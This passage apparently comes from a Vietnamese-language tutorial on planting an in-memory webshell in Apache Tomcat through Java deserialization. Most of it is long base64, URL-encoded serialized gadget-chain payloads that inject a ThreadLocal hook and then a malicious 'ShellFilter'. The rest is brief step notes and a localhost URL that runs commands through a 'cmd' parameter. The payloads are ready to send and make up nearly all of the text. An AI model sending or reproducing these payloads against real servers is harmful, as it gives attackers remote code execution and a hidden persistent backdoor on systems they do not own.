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%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%2BkhtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAYTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD%2F%2F%2F%2F%2FdXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX%2BAYIVOACAAB4cAAAGuDK%2Frq%2BAAAANAE%2FCgBRALUHALYIALcKAD4AuAoAuQC6CgC5ALsHALwKAAcAvQcAvgsACQC%2FCACDCwAJAMAIAMELAMIAwwsAwgDECgDFAMYKAMUAxwoAyADJBwDKCgATAMsIAMwKABMAzQoAEwDOCgATAM8IANAKABMA0QoA0gDTCgDSANQKANIA0QcA1QoAHgDWBwDXCgAgANYLANgA2QoAKAC%2FCgBCANoIANsHANwHAN0HAN4KACgAtQgA3wcA4AoAKwC1CgArAOEKACsA4goAPgDjCgArAOQKACcA5QcA5goAMgC1CADnCgAyAOgKADIA4gkA6QDqCgDpAOsKADIA7AoAJwDtCAChBwDuBwDvBwDwBwDxCgA%2BAPIKAPMAugcA9AoA8wD1CwA8APYHAPcKAEUA1gcA%2BAoARwDWBwD5CgBJANYHAPoKAEsA1gcA%2BwoATQDWBwD8CgBPANYHAP0HAP4BAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAFExUb21jYXRGaWx0ZXJJbmplY3Q7AQARZ2V0U2VydmxldENvbnRleHQBACAoKUxqYXZheC9zZXJ2bGV0L1NlcnZsZXRDb250ZXh0OwEADnNlcnZsZXRSZXF1ZXN0AQAeTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7AQAYbGFzdFNlcnZpY2VkUmVxdWVzdEZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAC3RocmVhZExvY2FsAQAXTGphdmEvbGFuZy9UaHJlYWRMb2NhbDsBAA1TdGFja01hcFRhYmxlBwD%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%2BBwEBBwECBwEDBwEEBwEFBwDKBwDVBwDXBwEGAQAIPGNsaW5pdD4BAA5zZXJ2bGV0Q29udGV4dAEAHkxqYXZheC9zZXJ2bGV0L1NlcnZsZXRDb250ZXh0OwEAD2FwcENvbnRleHRGaWVsZAEAEmFwcGxpY2F0aW9uQ29udGV4dAEALUxvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvQXBwbGljYXRpb25Db250ZXh0OwEAFHN0YW5kYXJkQ29udGV4dEZpZWxkAQAPc3RhbmRhcmRDb250ZXh0AQAqTG9yZy9hcGFjaGUvY2F0YWxpbmEvY29yZS9TdGFuZGFyZENvbnRleHQ7AQAGZmlsdGVyAQAEbmFtZQEACWZpbHRlckRlZgEAMUxvcmcvYXBhY2hlL3Rvb
WNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlckRlZjsBAAlmaWx0ZXJNYXABADFMb3JnL2FwYWNoZS90b21jYXQvdXRpbC9kZXNjcmlwdG9yL3dlYi9GaWx0ZXJNYXA7AQAHQ29uZmlncwEADWZpbHRlckNvbmZpZ3MBAA9MamF2YS91dGlsL01hcDsBAAtjb25zdHJ1Y3RvcgEAH0xqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjsBAAxmaWx0ZXJDb25maWcBADJMb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL0FwcGxpY2F0aW9uRmlsdGVyQ29uZmlnOwEAIExqYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb247AQAiTGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uOwEAIkxqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbjsBAC1MamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbjsBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBACJMamF2YS9sYW5nL0luc3RhbnRpYXRpb25FeGNlcHRpb247BwD3BwD4BwD5BwD6BwD7BwD8AQAKU291cmNlRmlsZQEAF1RvbWNhdEZpbHRlckluamVjdC5qYXZhDABTAFQBAC9vcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvQXBwbGljYXRpb25GaWx0ZXJDaGFpbgEAE2xhc3RTZXJ2aWNlZFJlcXVlc3QMAQcBCAcA%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%2FQAwBwBjBwBkAGUAAAAIAAMARwBFAEkAAQBmAGcAAgBVAAAAPwAAAAMAAAABsQAAAAIAVgAAAAYAAQAAAFQAVwAAACAAAwAAAAEAWABZAAAAAAABAGgAaQABAAAAAQBqAGsAAgBlAAAABAABAGwAAQBmAG0AAgBVAAAASQAAAAQAAAABsQAAAAIAVgAAAAYAAQAAAFkAVwAAACoABAAAAAEAWABZAAAAAAABAGgAaQABAAAAAQBuAG8AAgAAAAEAcABxAAMAZQAAAAQAAQBsAAEAcgBzAAIAVQAAAbUAAwAJAAAAgysSC7kADAIAOgQsEg25AA4CACy5AA8BADoFGQTGAF64ABAZBLYAEbYAEjoGuwATWRkGtwAUEhW2ABY6BxkHtgAXmQALGQe2ABinAAUSGToIGQe2ABoZBRkItgAbGQW2ABwZBbYAHacAFDoGGQa2AB%2BnAAo6BhkGtgAhLSssuQAiAwCxAAIAHwBmAGkAHgAfAGYAcwAgAAMAVgAAAE4AEwAAAFwACgBdABIAXgAaAF8AHwBhACwAYwA8AGQAUABlAFUAZgBcAGcAYQBoAGYAbQBpAGkAawBqAHAAbQBzAGsAdQBsAHoAbwCCAHAAVwAAAHAACwAsADoAdAB1AAYAPAAqAHYAdwAHAFAAFgB4AHkACABrAAUAegB7AAYAdQAFAHwAfQAGAAAAgwBYAFkAAAAAAIMAfgBdAAEAAACDAH8AgAACAAAAgwCBAIIAAwAKAHkAgwB5AAQAGgBpAIQAhQAFAGIAAABGAAX%2FAEwACAcAhgcAhwcAiAcAiQcAigcAiwcAjAcAjQAAQQcAiv8AGgAGBwCGBwCHBwCIBwCJBwCKBwCLAAEHAI5JBwCPBgBlAAAABgACAB4AkAAIAJEAVAABAFUAAAMFAAUADQAAASS4ACNLKrYAJBIltgAETCsEtgAFKyq2AAbAACZNLLYAJBIltgAETi0EtgAFLSy2AAbAACc6BLsAKFm3ACk6BRIqOga7ACtZtwAsOgcZBxkFtgAtGQcZBrYALhkHGQW2ACS2AC%2B2ADAZBBkHtgAxuwAyWbcAMzoIGQgSNLYANRkIGQa2ADY
ZCLIAN7YAOLYAORkEGQi2ADoZBLYAJBI7tgAEOgkZCQS2AAUZCRkEtgAGwAA8OgoSPQW9AD5ZAxI%2FU1kEEitTtgBAOgsZCwS2AEEZCwW9AEJZAxkEU1kEGQdTtgBDwAA9OgwZChkGGQy5AEQDAFenADBLKrYARqcAKEsqtgBIpwAgSyq2AEqnABhLKrYATKcAEEsqtgBOpwAISyq2AFCxAAYAAADzAPYARQAAAPMA%2FgBHAAAA8wEGAEkAAADzAQ4ASwAAAPMBFgBNAAAA8wEeAE8AAwBWAAAAtgAtAAAAFwAEABgADgAZABMAGgAcABsAJgAcACsAHQA1AB8APgAgAEIAIQBLACIAUgAjAFkAJABmACUAbQAnAHYAKAB9ACkAhAAqAI8AKwCWAC0AogAuAKgALwC0ADEAyQAyAM8AMwDnADQA8wBCAPYANgD3ADcA%2BwBCAP4AOAD%2FADkBAwBCAQYAOgEHADsBCwBCAQ4APAEPAD0BEwBCARYAPgEXAD8BGwBCAR4AQAEfAEEBIwBDAFcAAADAABMABADvAJIAkwAAAA4A5QCUAF8AAQAcANcAlQCWAAIAJgDNAJcAXwADADUAvgCYAJkABAA%2BALUAmgBZAAUAQgCxAJsAeQAGAEsAqACcAJ0ABwB2AH0AngCfAAgAogBRAKAAXwAJALQAPwChAKIACgDJACoAowCkAAsA5wAMAKUApgAMAPcABAB6AKcAAAD%2FAAQAegCoAAABBwAEAHoAqQAAAQ8ABAB6AKoAAAEXAAQAegCrAAABHwAEAHoArAAAAGIAAAAdAAf3APYHAK1HBwCuRwcAr0cHALBHBwCxRwcAsgQAAQCzAAAAAgC0cHQABWFoaWhpcHcBAHh1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAF2cgAdamF2YXgueG1sLnRyYW5zZm9ybS5UZW1wbGF0ZXMAAAAAAAAAAAAAAHhwc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA%2FQAAAAAAAAHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB%2BAC0%3D
Trước khi inject:
Danh sách Filters chỉ có 1 Filter mặc định
Tiến hành inject:
Sau khi inject:
Danh sách filter đã có thêm ShellFilter do ta inject
Lúc này chỉ cần truy cập bất kỳ path nào với param cmd để RCE
C. Tóm tắt cách khai thác
Gửi payload deser để inject ThreadLocal
rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAMADWphdmEudXRpbC5NYXAAE2phdmEubGFuZy5DbG9uZWFibGUAFGphdmEuaW8uU2VyaWFsaXphYmxleHIAF2phdmEubGFuZy5yZWZsZWN0LlByb3h54SfaIMwQQ8sCAAFMAAFodAAlTGphdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25IYW5kbGVyO3hwc3EAfgAAc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl%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%2BkhtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAYTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD%2F%2F%2F%2F%2FdXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX%2BAYIVOACAAB4cAAAC%2BDK%2Frq%2BAAAANACECgAfAEcIAEgKAEkASggASwoASQBMBwBNCABOCABPBwBQCABRCgAJAFIKAAkAUwcAVAoACQBVCgAJAFYKAAkAVwoACQBYBwBZCgASAEcKAAkAWgoAEgBbBwBcCwAWAF0IAF4KAF8AYAoAXwBhCgBfAGIHAGMKABwAZAcAZQcAZgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQATTFRocmVhZExvY2FsSW5qZWN0OwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwBnAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R
0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAC3RocmVhZExvY2FsAQAXTGphdmEvbGFuZy9UaHJlYWRMb2NhbDsBAA9zZXJ2bGV0UmVzcG9uc2UBAB9MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7AQAGd3JpdGVyAQAVTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAWV1JBUF9TQU1FX09CSkVDVF9GSUVMRAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBABhsYXN0U2VydmljZWRSZXF1ZXN0RmllbGQBABlsYXN0U2VydmljZWRSZXNwb25zZUZpZWxkAQAObW9kaWZpZXJzRmllbGQBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAUAcAYwEAClNvdXJjZUZpbGUBABZUaHJlYWRMb2NhbEluamVjdC5qYXZhDAAgACEBAC5vcmcuYXBhY2hlLmNhdGFsaW5hLmNvcmUuQXBwbGljYXRpb25EaXNwYXRjaGVyBwBoDABpAGoBABBXUkFQX1NBTUVfT0JKRUNUDABrAGwBAC9vcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvQXBwbGljYXRpb25GaWx0ZXJDaGFpbgEAE2xhc3RTZXJ2aWNlZFJlcXVlc3QBABRsYXN0U2VydmljZWRSZXNwb25zZQEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAJbW9kaWZpZXJzDABtAG4MAG8AcAEAGmphdmEvbGFuZy9yZWZsZWN0L01vZGlmaWVyDABxAHIMAHMAdAwAdQB2DAB3AHgBABVqYXZhL2xhbmcvVGhyZWFkTG9jYWwMAHkAegwAdwB7AQAdamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2UMAHwAfQEAIEluamVjdCBUaHJlYWRMb2NhbCBTdWNjZXNzZnVsbHkhBwB%2BDAB%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%2BADwAAgAjAKQAPwA8AAMAywAEAEAAQQAAAEIAAAAjAAb%2FAGkABAcAQwcAQwcAQwcAQwAAExP%2FADUAAAAAQgcARAQAAQBFAAAAAgBGcHQABWFoaWhpcHcBAHh1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAF2cgAdamF2YXgueG1sLnRyYW5zZm9ybS5UZW1wbGF0ZXMAAAAAAAAAAAAAAHhwc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA%2FQAAAAAAAAHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB%2BAC0%3D
Gửi payload deser để inject malicious Filter
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%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%2BkhtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAYTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD%2F%2F%2F%2F%2FdXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX%2BAYIVOACAAB4cAAAGuDK%2Frq%2BAAAANAE%2FCgBRALUHALYIALcKAD4AuAoAuQC6CgC5ALsHALwKAAcAvQcAvgsACQC%2FCACDCwAJAMAIAMELAMIAwwsAwgDECgDFAMYKAMUAxwoAyADJBwDKCgATAMsIAMwKABMAzQoAEwDOCgATAM8IANAKABMA0QoA0gDTCgDSANQKANIA0QcA1QoAHgDWBwDXCgAgANYLANgA2QoAKAC%2FCgBCANoIANsHANwHAN0HAN4KACgAtQgA3wcA4AoAKwC1CgArAOEKACsA4goAPgDjCgArAOQKACcA5QcA5goAMgC1CADnCgAyAOgKADIA4gkA6QDqCgDpAOsKADIA7AoAJwDtCAChBwDuBwDvBwDwBwDxCgA%2BAPIKAPMAugcA9AoA8wD1CwA8APYHAPcKAEUA1gcA%2BAoARwDWBwD5CgBJANYHAPoKAEsA1gcA%2BwoATQDWBwD8CgBPANYHAP0HAP4BAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAFExUb21jYXRGaWx0ZXJJbmplY3Q7AQARZ2V0U2VydmxldENvbnRleHQBACAoKUxqYXZheC9zZXJ2bGV0L1NlcnZsZXRDb250ZXh0OwEADnNlcnZsZXRSZXF1ZXN0AQAeTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7AQAYbGFzdFNlcnZpY2VkUmVxdWVzdEZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAC3RocmVhZExvY2FsAQAXTGphdmEvbGFuZy9UaHJlYWRMb2NhbDsBAA1TdGFja01hcFRhYmxlBwD%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%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%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%2FQAwBwBjBwBkAGUAAAAIAAMARwBFAEkAAQBmAGcAAgBVAAAAPwAAAAMAAAABsQAAAAIAVgAAAAYAAQAAAFQAVwAAACAAAwAAAAEAWABZAAAAAAABAGgAaQABAAAAAQBqAGsAAgBlAAAABAABAGwAAQBmAG0AAgBVAAAASQAAAAQAAAABsQAAAAIAVgAAAAYAAQAAAFkAVwAAACoABAAAAAEAWABZAAAAAAABAGgAaQABAAAAAQBuAG8AAgAAAAEAcABxAAMAZQAAAAQAAQBsAAEAcgBzAAIAVQAAAbUAAwAJAA
AAgysSC7kADAIAOgQsEg25AA4CACy5AA8BADoFGQTGAF64ABAZBLYAEbYAEjoGuwATWRkGtwAUEhW2ABY6BxkHtgAXmQALGQe2ABinAAUSGToIGQe2ABoZBRkItgAbGQW2ABwZBbYAHacAFDoGGQa2AB%2BnAAo6BhkGtgAhLSssuQAiAwCxAAIAHwBmAGkAHgAfAGYAcwAgAAMAVgAAAE4AEwAAAFwACgBdABIAXgAaAF8AHwBhACwAYwA8AGQAUABlAFUAZgBcAGcAYQBoAGYAbQBpAGkAawBqAHAAbQBzAGsAdQBsAHoAbwCCAHAAVwAAAHAACwAsADoAdAB1AAYAPAAqAHYAdwAHAFAAFgB4AHkACABrAAUAegB7AAYAdQAFAHwAfQAGAAAAgwBYAFkAAAAAAIMAfgBdAAEAAACDAH8AgAACAAAAgwCBAIIAAwAKAHkAgwB5AAQAGgBpAIQAhQAFAGIAAABGAAX%2FAEwACAcAhgcAhwcAiAcAiQcAigcAiwcAjAcAjQAAQQcAiv8AGgAGBwCGBwCHBwCIBwCJBwCKBwCLAAEHAI5JBwCPBgBlAAAABgACAB4AkAAIAJEAVAABAFUAAAMFAAUADQAAASS4ACNLKrYAJBIltgAETCsEtgAFKyq2AAbAACZNLLYAJBIltgAETi0EtgAFLSy2AAbAACc6BLsAKFm3ACk6BRIqOga7ACtZtwAsOgcZBxkFtgAtGQcZBrYALhkHGQW2ACS2AC%2B2ADAZBBkHtgAxuwAyWbcAMzoIGQgSNLYANRkIGQa2ADYZCLIAN7YAOLYAORkEGQi2ADoZBLYAJBI7tgAEOgkZCQS2AAUZCRkEtgAGwAA8OgoSPQW9AD5ZAxI%2FU1kEEitTtgBAOgsZCwS2AEEZCwW9AEJZAxkEU1kEGQdTtgBDwAA9OgwZChkGGQy5AEQDAFenADBLKrYARqcAKEsqtgBIpwAgSyq2AEqnABhLKrYATKcAEEsqtgBOpwAISyq2AFCxAAYAAADzAPYARQAAAPMA%2FgBHAAAA8wEGAEkAAADzAQ4ASwAAAPMBFgBNAAAA8wEeAE8AAwBWAAAAtgAtAAAAFwAEABgADgAZABMAGgAcABsAJgAcACsAHQA1AB8APgAgAEIAIQBLACIAUgAjAFkAJABmACUAbQAnAHYAKAB9ACkAhAAqAI8AKwCWAC0AogAuAKgALwC0ADEAyQAyAM8AMwDnADQA8wBCAPYANgD3ADcA%2BwBCAP4AOAD%2FADkBAwBCAQYAOgEHADsBCwBCAQ4APAEPAD0BEwBCARYAPgEXAD8BGwBCAR4AQAEfAEEBIwBDAFcAAADAABMABADvAJIAkwAAAA4A5QCUAF8AAQAcANcAlQCWAAIAJgDNAJcAXwADADUAvgCYAJkABAA%2BALUAmgBZAAUAQgCxAJsAeQAGAEsAqACcAJ0ABwB2AH0AngCfAAgAogBRAKAAXwAJALQAPwChAKIACgDJACoAowCkAAsA5wAMAKUApgAMAPcABAB6AKcAAAD%2FAAQAegCoAAABBwAEAHoAqQAAAQ8ABAB6AKoAAAEXAAQAegCrAAABHwAEAHoArAAAAGIAAAAdAAf3APYHAK1HBwCuRwcAr0cHALBHBwCxRwcAsgQAAQCzAAAAAgC0cHQABWFoaWhpcHcBAHh1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAF2cgAdamF2YXgueG1sLnRyYW5zZm9ybS5UZW1wbGF0ZXMAAAAAAAAAAAAAAHhwc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA%2FQAAAAAAAAHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB%2BAC0%3D
RCE
http://localhost:8989/TomcatDeser2Memshell_war/?cmd=whoami
Refer